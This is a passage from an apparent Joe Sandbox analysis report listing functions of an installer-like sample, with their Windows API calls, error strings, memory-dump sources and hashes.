                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21ce8758add20a2a22dadaf2113e4a44f78fca9ebcdd8fe5eaf1c5dd09bf538b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68210132941A39FBF7215A95AC05B9FAE69FB42B70F1A4020FD08EF601E661CD4096E1
                                                                                                                                                                                                                                                                                                  Function 00869839 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 70COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _memcpy_s
                                                                                                                                                                                                                                                                                                  • String ID: Failed to find variable.$Failed to parse condition '%ls' at position: %u$Failed to read next symbol.$condition.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2001391462-1605196437
                                                                                                                                                                                                                                                                                                  • Opcode ID: 253e292c37c4be8abe6f2d88bfa78fea59e41ebe6cbea6d1438b83ea95d170c3
                                                                                                                                                                                                                                                                                                  • Instruction ID: 753792835a69dce3b6b7db04ecf0af49a5fcd3bd71f7ebbb03648c4b8a0fcc10
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 253e292c37c4be8abe6f2d88bfa78fea59e41ebe6cbea6d1438b83ea95d170c3
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB11C432580324BBEF25296C9C86E963A1CFF17761F064171F950EFAD6CA72C910C6E2
                                                                                                                                                                                                                                                                                                  Function 00869E16 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 00869E38
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to set variable., xrefs: 00869E97
                                                                                                                                                                                                                                                                                                  • Failed get file version., xrefs: 00869E78
                                                                                                                                                                                                                                                                                                  • Failed to format path string., xrefs: 00869E43
                                                                                                                                                                                                                                                                                                  • File search: %ls, did not find path: %ls, xrefs: 00869EA3
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Open@16
                                                                                                                                                                                                                                                                                                  • String ID: Failed get file version.$Failed to format path string.$Failed to set variable.$File search: %ls, did not find path: %ls
                                                                                                                                                                                                                                                                                                  • API String ID: 3613110473-2458530209
                                                                                                                                                                                                                                                                                                  • Opcode ID: 3fb0ebe1e6a7f2e4216754c5b0f8a5131dafc2007d177b9add9fe24b72b529be
                                                                                                                                                                                                                                                                                                  • Instruction ID: 6e6371f9af28727402fd885d0bb28efb255d9139183d33c0980a76195693c028
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3fb0ebe1e6a7f2e4216754c5b0f8a5131dafc2007d177b9add9fe24b72b529be
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B118E32D40129BA9B02AAD88D82CAEBB6DFF14754F124166F910E6250D6765E10ABD1
                                                                                                                                                                                                                                                                                                  Function 0087820F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 66COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: GetProcessHeap.KERNEL32(?,000001C7,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863960
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: RtlAllocateHeap.NTDLL(00000000,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863967
                                                                                                                                                                                                                                                                                                  • CreateWellKnownSid.ADVAPI32(00000000,00000000,00000000,00000000,00000044,00000001,00000000,00000000,?,?,00878E17,0000001A,00000000,?,00000000,00000000), ref: 00878258
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00878E17,0000001A,00000000,?,00000000,00000000,?,?,00000000), ref: 00878262
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocateCreateErrorKnownLastProcessWell
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate memory for well known SID.$Failed to create well known SID.$cache.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2186923214-2110050797
                                                                                                                                                                                                                                                                                                  • Opcode ID: beeeeb21cc0ea084ab14744a8e0724bbd0dd21a423402ee659689dcba7626a0c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 169727d316e5975eac7d675ba1f98f9b9841dd8889993642ec9175069817e85f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: beeeeb21cc0ea084ab14744a8e0724bbd0dd21a423402ee659689dcba7626a0c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09015933591A25F7D62166994C0AE9B6A58FF82B72F114016FD18FB342EE74CD0045E1
                                                                                                                                                                                                                                                                                                  Function 0088DDA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65windowCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000003E8,000004FF), ref: 0088DDCE
                                                                                                                                                                                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0088DDF8
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0088DFC8,00000000,?,?,?,?,00000000), ref: 0088DE00
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed while waiting for download., xrefs: 0088DE2E
                                                                                                                                                                                                                                                                                                  • bitsengine.cpp, xrefs: 0088DE24
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastMessageMultipleObjectsPeekWait
                                                                                                                                                                                                                                                                                                  • String ID: Failed while waiting for download.$bitsengine.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 435350009-228655868
                                                                                                                                                                                                                                                                                                  • Opcode ID: 7c56511f0a5a5c0f7c8abdbbba1a2071cc0fc5909504431ef6558b34b7ae9990
                                                                                                                                                                                                                                                                                                  • Instruction ID: 6ec3d7daf97e162b2e8396eeb0ec88a43f9a6312f7e14dc1fd0167f5043c9430
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c56511f0a5a5c0f7c8abdbbba1a2071cc0fc5909504431ef6558b34b7ae9990
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D111C673A41335B7EA206AA99C49EDBBBACFF05761F000125FE04FB2C1D6659D0086E5
                                                                                                                                                                                                                                                                                                  Function 008A3C72 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ShellExecuteExW.SHELL32(?), ref: 008A3CC0
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000000), ref: 008A3CCA
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00000000), ref: 008A3CFD
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseErrorExecuteHandleLastShell
                                                                                                                                                                                                                                                                                                  • String ID: <$shelutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3023784893-3991740012
                                                                                                                                                                                                                                                                                                  • Opcode ID: 48904b8de9011173b569914a16b8bb69aa6e1362963ee9ef601805318313cb4d
                                                                                                                                                                                                                                                                                                  • Instruction ID: 59ba50f8182e807941e69ef30bf3820bb22c1c321cbcee7685aa36703832ec9f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 48904b8de9011173b569914a16b8bb69aa6e1362963ee9ef601805318313cb4d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6D11D3B5E01229ABDB10DFA9D945A8EBBF8FB09750F104129FD15F7340E7349A10CBA4
                                                                                                                                                                                                                                                                                                  Function 00865F2E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 59COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetComputerNameW.KERNEL32(?,00000010), ref: 00865F5C
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00865F66
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ComputerErrorLastName
                                                                                                                                                                                                                                                                                                  • String ID: Failed to get computer name.$Failed to set variant value.$variable.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3560734967-484636765
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0039bd45b7f3714737444257fc0da92de1bb35bfcfd70f0023e4e3fe8b314b37
                                                                                                                                                                                                                                                                                                  • Instruction ID: 72ffb33bb893ba2c4dd85841b8e7d7890d291d31fac4240280884fdcae934c2f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0039bd45b7f3714737444257fc0da92de1bb35bfcfd70f0023e4e3fe8b314b37
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD11CC33A45A296BD711DAA49C05BDEB7E8FB09720F124055FD00FB280DE75AE0447E2
                                                                                                                                                                                                                                                                                                  Function 00869A4D Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 57COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00869AC4
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Condition, xrefs: 00869A5F
                                                                                                                                                                                                                                                                                                  • Failed to copy condition string from BSTR, xrefs: 00869AAE
                                                                                                                                                                                                                                                                                                  • Failed to get Condition inner text., xrefs: 00869A94
                                                                                                                                                                                                                                                                                                  • Failed to select condition node., xrefs: 00869A7B
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FreeString
                                                                                                                                                                                                                                                                                                  • String ID: Condition$Failed to copy condition string from BSTR$Failed to get Condition inner text.$Failed to select condition node.
                                                                                                                                                                                                                                                                                                  • API String ID: 3341692771-3600577998
                                                                                                                                                                                                                                                                                                  • Opcode ID: e55612e986e222fa871854e7eaa5617ff9ecb24c8505bc5ab1d4433d25576c86
                                                                                                                                                                                                                                                                                                  • Instruction ID: f501b3fd283c056ebf5f23f4819aae752959055ef3b91a68079632d8a8950402
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e55612e986e222fa871854e7eaa5617ff9ecb24c8505bc5ab1d4433d25576c86
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A118E31941238BBEB129A94CD06FADBBADFB01722F124255FC41EA690CBB59E00D681
                                                                                                                                                                                                                                                                                                  Function 008667AA Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 56COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 008667E3
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008667ED
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastPathTemp
                                                                                                                                                                                                                                                                                                  • String ID: Failed to get temp path.$Failed to set variant value.$variable.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1238063741-2915113195
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2c7b8dafe2df43d72cd26a40b07dd8aef786f60a8b22fe40689f22cbac0fa14f
                                                                                                                                                                                                                                                                                                  • Instruction ID: bc4f9a42b7d620e2c1deb233643c9c7a8b5262318214a58d5b00ac1b7151e4d7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c7b8dafe2df43d72cd26a40b07dd8aef786f60a8b22fe40689f22cbac0fa14f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C001DB72E4173967E720AB645C06F9A7758FB05710F110175FD14F7282FA659D008BD6
                                                                                                                                                                                                                                                                                                  Function 00865E94 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?), ref: 00865EA6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00865EB2,00000000), ref: 008A0AE0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0ACC: GetProcAddress.KERNEL32(00000000), ref: 008A0AE7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0ACC: GetLastError.KERNEL32(?,?,?,00865EB2,00000000), ref: 008A0AFE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A3D1F: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 008A3D4C
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to set variant value., xrefs: 00865F0A
                                                                                                                                                                                                                                                                                                  • variable.cpp, xrefs: 00865ED0
                                                                                                                                                                                                                                                                                                  • Failed to get shell folder., xrefs: 00865EDA
                                                                                                                                                                                                                                                                                                  • Failed to get 64-bit folder., xrefs: 00865EF0
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressCurrentErrorFolderHandleLastModulePathProcProcess
                                                                                                                                                                                                                                                                                                  • String ID: Failed to get 64-bit folder.$Failed to get shell folder.$Failed to set variant value.$variable.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2084161155-3906113122
                                                                                                                                                                                                                                                                                                  • Opcode ID: e5e36e0c4a9086a513fd8095345794202ad80a039aa0124b53530e2eb14ba342
                                                                                                                                                                                                                                                                                                  • Instruction ID: c432cee85e4dc90fa489733035848e8d6a12b06cb48dc45434db13d685d989bc
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e5e36e0c4a9086a513fd8095345794202ad80a039aa0124b53530e2eb14ba342
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05018432941729BBEF22A794DC06BAE7A68FF01721F114151F800F6A50DF759B409BE6
                                                                                                                                                                                                                                                                                                  Function 008A4153 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A4440: FindFirstFileW.KERNEL32(0088923A,?,00000100,00000000,00000000), ref: 008A447B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A4440: FindClose.KERNEL32(00000000), ref: 008A4487
                                                                                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(0088923A,00000080,00000000,0088923A,000000FF,00000000,?,?,0088923A), ref: 008A4182
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0088923A), ref: 008A418C
                                                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(0088923A,00000000,0088923A,000000FF,00000000,?,?,0088923A), ref: 008A41AC
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0088923A), ref: 008A41B6
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: File$ErrorFindLast$AttributesCloseDeleteFirst
                                                                                                                                                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3967264933-2967768451
                                                                                                                                                                                                                                                                                                  • Opcode ID: 849325452b23ce4c7041111bb4243aef3c22d9393afc928bb2bd7e76dd8ca93b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 8e3b974a850baaa8e4c1f9d37b1edf4f88f89d5fc7de21def9a8cf1fcb6bc79f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 849325452b23ce4c7041111bb4243aef3c22d9393afc928bb2bd7e76dd8ca93b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD01F532A41636ABFF314AA98C05B5B7E98FF26761F010220FD44EB991E7A2CD9085D0
                                                                                                                                                                                                                                                                                                  Function 0088DA05 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0088DA1A
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0088DA5F
                                                                                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?,?,?,?), ref: 0088DA73
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failure while sending progress during BITS job modification., xrefs: 0088DA4E
                                                                                                                                                                                                                                                                                                  • Failed to get state during job modification., xrefs: 0088DA33
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterEventLeave
                                                                                                                                                                                                                                                                                                  • String ID: Failed to get state during job modification.$Failure while sending progress during BITS job modification.
                                                                                                                                                                                                                                                                                                  • API String ID: 3094578987-1258544340
                                                                                                                                                                                                                                                                                                  • Opcode ID: ba968ca759cbbd5dde442b66ceccccabd6e69b07701eaf4c0eb04b5e1eddc8ad
                                                                                                                                                                                                                                                                                                  • Instruction ID: 37ea36f0965b8155e952bdb7a3be911fe4474add1ff5a9724f44443567484695
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ba968ca759cbbd5dde442b66ceccccabd6e69b07701eaf4c0eb04b5e1eddc8ad
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA01D232604725FBDB15EF55C848A6EB7B8FF05321B104209E904D7641D730ED04CBD1
                                                                                                                                                                                                                                                                                                  Function 0088DC7E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 50COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000008,?,00000000,00000000,00000000,?,0088DDEE), ref: 0088DC92
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000008,?,0088DDEE), ref: 0088DCD7
                                                                                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?,?,0088DDEE), ref: 0088DCEB
